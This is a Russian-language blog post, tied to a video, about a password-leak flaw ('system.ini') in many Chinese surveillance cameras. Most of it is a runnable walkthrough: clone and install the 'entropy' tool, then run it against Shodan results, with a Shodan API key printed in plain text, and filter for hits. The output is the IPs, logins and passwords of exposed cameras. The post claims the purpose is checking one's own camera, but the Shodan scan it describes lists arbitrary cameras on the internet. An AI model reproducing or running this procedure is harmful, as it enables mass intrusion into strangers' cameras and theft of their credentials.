Нововведение в редакторе. Вставка постов из Telegram
ТОП ЗА 3 ДНЯ
"Отрицательный резус" После сноса укробазы ищут странных доноров
pretty 138
Международное право, в примерах
Александр Роджерс 67
Невоенный анализ-59. 18 апреля 2024
Александр Роджерс 56
Мудрая речь: Токаев объяснил казахам, что будет, если попробовать вытеснить русский язык и всё русское из Казахстана
Язабыл Падписацца Асёл 106
Сатира и юмор на злобу дня в картинках 240.
Игорь Мамашвили 32

Критическая уязвимость камер

5 1201

| Взлом камер без брутфорса | Как защититься от взлома? | UnderMind

  ● В этом ролике: я расскажу вам о том, как злоумышленники взламывают камеры используя массовую и критическую уязвимость камер видеонаблюдения. Эта уязвимость позволяет подключиться к вашей камере в обход пароля. 

Я всегда учу Вас выбирать хорошие пароли, поскольку злоумышленники пользуются брутфорсом и подбирают лёгкие пароли за считанные минуты. Но сегодняшняя уязвимость, которую я обнаружил на своей камере, позволяет злоумышленникам с лёгкостью получить пароль от вашей камеры (причем пароль любой сложности) буквально за пару минут. И это не используя брутфорс. После просмотра этого ролика, вы узнаете как проверить свою камеру и как защитить себя от подобной уязвимости.

 Статья в дополнение к моему ролику о взломе камер видеонаблюдения. 

 Слышали что злоумышленники могут взламывать ваши камеры, не используя брутфорс? Это возможно благодаря критической уязвимости, которая есть почти во всех китайских камерах видеонаблюдения.

Чтобы проверить СВОЮ камеру на устойчивость к эксплоиту system.ini, я воспользовался Kali Linux (хотя можно и не только им).

Для начала клонируем репозиторий entropy

git clone https://github.com/entynetproject/entropy.git

Переходим в каталог с утилитой

cd entropy

Назначаем права на запуск установщика

chmod +x install.sh

И устанавливаем саму утилиту

./install.sh

Но у меня без установки зависимостей утилита не захотела работать, поэтому мне пришлось вводить такую команду. В вашем случае, возможно, придется вводить pip или pip2 - если будут ошибки. Это зависит от версии python, которую вы будете использовать

pip3 install -r requirements.txt

Теперь регистрируемся в shodan, и получаем API ключ.

После этого, запускаем саму утилиту, указав свой API ключ Shodan

python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T"

А для фильтрации вывода (чтобы у нас отображался список только уязвимых камер), мы воспользуемся утилитой grep

python3 entropy.py -b 2 -v --shodan "o7X2SlIJiidq3XgA9iM8t34HYj69pB7T" | grep [+]

В результате вы увидите IP, логин и пароль уязвимой камеры, которую Вам надо будет защитить. Мы ведь не занимаемся взломами в противозаконных целях.

Пожалуйста, проверяйте только свои камеры на защищенность и только в ознакомительных целях.

Don't be evil, be root.

 

Россия становится центром мировой экономики

Ирану что-то прилетело: то ли ракеты, то ли несколько беспилотников, то ли попали, то ли не попали. Может узнаем, может не узнаем. Косвенно узнаем так: если ответа Ирана не будет, значи...

Обсудить